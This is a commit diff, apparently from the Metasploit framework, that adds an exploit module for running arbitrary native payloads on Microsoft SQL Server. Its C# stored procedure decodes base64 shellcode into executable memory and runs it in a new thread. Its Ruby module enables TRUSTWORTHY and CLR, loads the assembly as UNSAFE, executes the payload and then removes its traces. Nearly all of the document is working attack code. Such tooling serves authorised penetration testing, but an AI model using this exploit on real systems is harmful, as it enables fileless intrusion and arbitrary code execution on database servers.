Add v1 of SQL Clr stored proc payload module

OJ · OJ · commit 1c62559e55e9 · 2017-02-10T10:28:22.000+10:00
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v2.0.cs b/external/source/SqlClrPayload/AssemblyAttributes-v2.0.cs
@@ -0,0 +1 @@
+// Deliberately blank
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v3.5.cs b/external/source/SqlClrPayload/AssemblyAttributes-v3.5.cs
@@ -0,0 +1 @@
+// Deliberately blank
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.0.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.0.cs
@@ -0,0 +1,3 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.5.1.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.5.1.cs
@@ -0,0 +1,5 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.1", FrameworkDisplayName = ".NET Framework 4.5.1")]
+
+
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.5.2.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.5.2.cs
@@ -0,0 +1,4 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5.2", FrameworkDisplayName = ".NET Framework 4.5.2")]
+
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.5.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.5.cs
@@ -0,0 +1,4 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.5", FrameworkDisplayName = ".NET Framework 4.5")]
+
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.6.1.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.6.1.cs
@@ -0,0 +1,3 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6.1", FrameworkDisplayName = ".NET Framework 4.6.1")]
diff --git a/external/source/SqlClrPayload/AssemblyAttributes-v4.6.cs b/external/source/SqlClrPayload/AssemblyAttributes-v4.6.cs
@@ -0,0 +1,3 @@
+using System;
+using System.Reflection;
+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.6", FrameworkDisplayName = ".NET Framework 4.6")]
diff --git a/external/source/SqlClrPayload/AssemblyInfo.cs b/external/source/SqlClrPayload/AssemblyInfo.cs
@@ -0,0 +1,36 @@
+﻿using System.Reflection;
+using System.Runtime.CompilerServices;
+using System.Runtime.InteropServices;
+
+// General Information about an assembly is controlled through the following 
+// set of attributes. Change these attribute values to modify the information
+// associated with an assembly.
+[assembly: AssemblyTitle("SqlClrPayload")]
+[assembly: AssemblyDescription("")]
+[assembly: AssemblyConfiguration("")]
+[assembly: AssemblyCompany("")]
+[assembly: AssemblyProduct("SqlClrPayload")]
+[assembly: AssemblyCopyright("Copyright ©  2017")]
+[assembly: AssemblyTrademark("")]
+[assembly: AssemblyCulture("")]
+
+// Setting ComVisible to false makes the types in this assembly not visible 
+// to COM components.  If you need to access a type in this assembly from 
+// COM, set the ComVisible attribute to true on that type.
+[assembly: ComVisible(false)]
+
+// The following GUID is for the ID of the typelib if this project is exposed to COM
+[assembly: Guid("33827137-7d8c-40e5-afd9-d71e916e0e2d")]
+
+// Version information for an assembly consists of the following four values:
+//
+//      Major Version
+//      Minor Version 
+//      Build Number
+//      Revision
+//
+// You can specify all the values or you can default the Build and Revision Numbers 
+// by using the '*' as shown below:
+// [assembly: AssemblyVersion("1.0.*")]
+[assembly: AssemblyVersion("1.0.0.0")]
+[assembly: AssemblyFileVersion("1.0.0.0")]
diff --git a/external/source/SqlClrPayload/StoredProcedures.cs b/external/source/SqlClrPayload/StoredProcedures.cs
@@ -0,0 +1,23 @@
+﻿using System;
+
+public partial class StoredProcedures
+{
+    private static Int32 MEM_COMMIT = 0x1000;
+    private static IntPtr PAGE_EXECUTE_READWRITE = (IntPtr)0x40;
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr VirtualAlloc(IntPtr lpStartAddr, UIntPtr size, Int32 flAllocationType, IntPtr flProtect);
+
+    [System.Runtime.InteropServices.DllImport("kernel32")]
+    private static extern IntPtr CreateThread(IntPtr lpThreadAttributes, UIntPtr dwStackSize, IntPtr lpStartAddress, IntPtr param, Int32 dwCreationFlags, ref IntPtr lpThreadId);
+
+    [Microsoft.SqlServer.Server.SqlProcedure]
+    public static void ExecuteB64Payload(string base64EncodedPayload)
+    {
+        var bytes = Convert.FromBase64String(base64EncodedPayload);
+        var mem = VirtualAlloc(IntPtr.Zero,(UIntPtr)bytes.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
+        System.Runtime.InteropServices.Marshal.Copy(bytes, 0, mem, bytes.Length);
+        var threadId = IntPtr.Zero;
+        CreateThread(IntPtr.Zero, UIntPtr.Zero, mem, IntPtr.Zero, 0, ref threadId);
+    }
+}
diff --git a/external/source/SqlClrPayload/make.bat b/external/source/SqlClrPayload/make.bat
@@ -0,0 +1,48 @@
+@ECHO OFF
+IF "%VSINSTALLDIR%" == "" GOTO NEED_VS
+
+SET FRAMEWORKDIR=%VSINSTALLDIR%..\Reference Assemblies\Microsoft\Framework\.NETFramework
+SET DNETDIR=%WINDIR%\Microsoft.NET\Framework
+SET TARGETDIR=..\..\..\data\SqlClrPayload
+
+mkdir "%TARGETDIR%" 2> NUL
+
+SET VER=v2.0
+SET FW=%DNETDIR%\v2.0.50727
+IF EXIST "%FW%" (
+  ECHO Building SqlClrPayload for .NET %VER%
+  mkdir "%TARGETDIR%\%VER%" 2> NUL
+  csc.exe /nologo /noconfig /unsafe+ /nowarn:1701,1702,2008 /nostdlib+ /errorreport:none /warn:4 /errorendlocation /preferreduilang:en-US /highentropyva- /reference:"%FW%\mscorlib.dll" /reference:"%FW%\System.Data.dll" /reference:"%FW%\System.dll" /debug- /filealign:512 /optimize+ /out:%TARGETDIR%\%VER%\SqlClrPayload.dll /target:library /utf8output StoredProcedures.cs AssemblyInfo.cs AssemblyAttributes-%VER%.cs
+)
+
+SET VER=v3.5
+SET CORE=%FRAMEWORKDIR%\..\%VER%
+SET FW=%DNETDIR%\v2.0.50727
+IF EXIST "%CORE%" (
+  ECHO Building SqlClrPayload for .NET %VER%
+  mkdir "%TARGETDIR%\%VER%" 2> NUL
+  csc.exe /nologo /noconfig /unsafe+ /nowarn:1701,1702,2008 /nostdlib+ /errorreport:none /warn:4 /errorendlocation /preferreduilang:en-US /highentropyva- /reference:"%FW%\mscorlib.dll" /reference:"%CORE%\System.Core.dll" /reference:"%FW%\System.Data.dll" /reference:"%FW%\System.dll" /debug- /filealign:512 /optimize+ /out:%TARGETDIR%\%VER%\SqlClrPayload.dll /target:library /utf8output StoredProcedures.cs AssemblyInfo.cs AssemblyAttributes-%VER%.cs
+)
+
+FOR %%v IN (v4.0 v4.5 v4.5.1 v4.5.2 v4.6 v4.6.1) DO CALL :BUILDLATEST %%v
+
+ECHO Done.
+GOTO :END
+
+:NEED_VS
+ECHO "This command must be executed from within a Visual Studio Command prompt."
+ECHO "This can be found under Microsoft Visual Studio 2013 -> Visual Studio Tools"
+
+:END
+
+EXIT /B 0
+
+:BUILDLATEST
+SET VER=%~1
+SET FW=%FRAMEWORKDIR%\%VER%
+IF EXIST "%FW%" (
+  ECHO Building SqlClrPayload for .NET %VER%
+  mkdir "%TARGETDIR%\%VER%" 2> NUL
+  csc.exe /nologo /noconfig /unsafe+ /nowarn:1701,1702,2008 /nostdlib+ /errorreport:none /warn:4 /errorendlocation /preferreduilang:en-US /highentropyva- /reference:"%FW%\mscorlib.dll" /reference:"%FW%\System.Core.dll" /reference:"%FW%\System.Data.dll" /reference:"%FW%\System.dll" /debug- /filealign:512 /optimize+ /out:%TARGETDIR%\%VER%\SqlClrPayload.dll /target:library /utf8output StoredProcedures.cs AssemblyInfo.cs AssemblyAttributes-%VER%.cs
+)
+EXIT /B 0
diff --git a/modules/exploits/windows/mssql/mssql_clr_payload.rb b/modules/exploits/windows/mssql/mssql_clr_payload.rb
@@ -0,0 +1,174 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::MSSQL
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Microsoft SQL Server Clr Stored Procedure Payload Execution',
+      'Description'    => %q{
+      This module executes an arbitrary native payload on a Microsoft SQL
+      server by loading a custom SQL CLR Assembly into the target SQL
+      installation, and calling it directly with a base64-encoded payload.
+
+      The module requires working credentials in order to connect directly to the
+      MSSQL Server.
+
+      This method requires the user to have sufficient privileges to install a custom
+      SQL CRL DLL, and invoke the custom stored procedure that comes with it.
+
+      This exploit does not leave any binaries on disk.
+      },
+      'Author'         =>
+        [
+          'Lee Christensen',  # original idea/research
+          'Nathan Kirk',      # extra research/blog post
+          'OJ Reeves'         # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://sekirkity.com/command-execution-in-sql-server-via-fileless-clr-based-custom-stored-procedure/']
+        ],
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X64],
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 01 1999'
+    ))
+
+    register_options(
+      [
+        OptString.new('DATABASE', [true, 'The database to load the CLR Assembly into.', 'master'])
+      ])
+  end
+
+  def check
+    unless mssql_login_datastore
+      vprint_status("Invalid SQL Server credentials")
+      return Exploit::CheckCode::Detected
+    end
+
+    if mssql_is_sysadmin
+      vprint_good "User #{datastore['USERNAME']} is a sysadmin"
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  ensure
+    disconnect
+  end
+
+  def get_exploit_version(sql_version_string)
+    'v3.5'
+  end
+
+  def set_trustworthy(on)
+      mssql_query("ALTER DATABASE [#{datastore['DATABASE']}] SET TRUSTWORTHY #{on ? 'ON' : 'OFF'}", false)
+  end
+
+  def is_trustworthy
+    # SQLi in MSF!! OMG!
+    result = mssql_query("SELECT CASE is_trustworthy_on WHEN 1 THEN 'ON' ELSE 'OFF' END FROM sys.databases WHERE name ='#{datastore['DATABASE']}'", false)
+    result[:rows][0] == 'ON'
+  end
+
+  def enable_clr(enable)
+    query = %Q^
+EXEC sp_configure 'show advanced options', 1;
+RECONFIGURE;
+EXEC sp_configure 'clr enabled', #{enable ? 1 : 0};
+RECONFIGURE;
+    ^
+    mssql_query(query, false)
+  end
+
+  def is_clr_enabled
+    result = mssql_query("SELECT CASE value WHEN 1 THEN 'ON' ELSE 'OFF' END FROM sys.configurations WHERE name = 'clr enabled'", false)
+    result[:rows][0] == 'ON'
+  end
+
+  def exploit
+    mssql_login_datastore
+
+    unless mssql_is_sysadmin
+      fail_with(Failure::BadConfig, 'Specified user lacks sufficient permissions')
+    end
+
+    unless datastore['EXITFUNC'].downcase == 'thread'
+      fail_with(Failure::BadConfig, 'EXITFUNC must be set to "thread"')
+    end
+
+    trustworthy = is_trustworthy
+    clr_enabled = is_clr_enabled
+
+    unless trustworthy
+      print_status('Database does not have TRUSTWORTHY setting on, enabling ...')
+      set_trustworthy(true)
+    end
+
+    unless clr_enabled
+      print_status('Database does not have CLR support enabled, enabling ...')
+      enable_clr(true)
+    end
+
+    sql_version = mssql_query("select @@version", false)[:rows].first[0]
+    vprint_status("Target SQL Version is:\n#{sql_version}")
+    exploit_version = get_exploit_version(sql_version)
+    print_status("Using version #{exploit_version} of the Assembly")
+    exploit_file_path = ::File.join(Msf::Config.install_root, 'data',
+                                    'SqlClrPayload', exploit_version, 'SqlClrPayload.dll')
+    vprint_status("Using #{exploit_file_path}")
+
+    assembly = ::File.read(exploit_file_path)
+
+    # Convert the assembly to the required format for execution of the stored
+    # procedure to create the custom stored proc
+    hex_assembly = "0x#{assembly.unpack('H*')[0]}"
+    query = "CREATE ASSEMBLY [runstuff] AUTHORIZATION [dbo] FROM #{hex_assembly} WITH PERMISSION_SET = UNSAFE"
+
+    print_status('Adding custom payload assembly ...')
+    mssql_query(query, false)
+
+    query = "CREATE PROCEDURE [dbo].[ExecuteB64Payload](@base64EncodedPayload AS NVARCHAR(MAX)) AS EXTERNAL NAME [runstuff].[StoredProcedures].[ExecuteB64Payload]"
+
+    print_status('Exposing payload execution stored procedure ...')
+    mssql_query(query, false)
+
+    # Generate the base64 encoded payload
+    b64payload = Rex::Text.encode_base64(payload.encoded)
+    query = "EXEC [dbo].[ExecuteB64Payload] '#{b64payload}'"
+    print_status('Executing the payload ...')
+    mssql_query(query, false)
+
+    print_status('Removing stored procedure ...')
+    mssql_query('DROP PROCEDURE [dbo].[ExecuteB64payload]', false)
+
+    print_status('Removing assembly ...')
+    mssql_query('DROP ASSEMBLY [runstuff]', false)
+
+    unless clr_enabled
+      print_status('Restoring CLR setting ...')
+      enable_clr(false)
+    end
+
+    unless trustworthy
+      print_status('Restoring Trustworthy setting ...')
+      set_trustworthy(false)
+    end
+
+  ensure
+    disconnect
+  end
+
+end

Original file line number	Diff line number	Diff line change
`@@ -0,0 +1,3 @@`
	`1`	`+using System;`
	`2`	`+using System.Reflection;`
	`3`	`+[assembly: global::System.Runtime.Versioning.TargetFrameworkAttribute(".NETFramework,Version=v4.0", FrameworkDisplayName = ".NET Framework 4")]`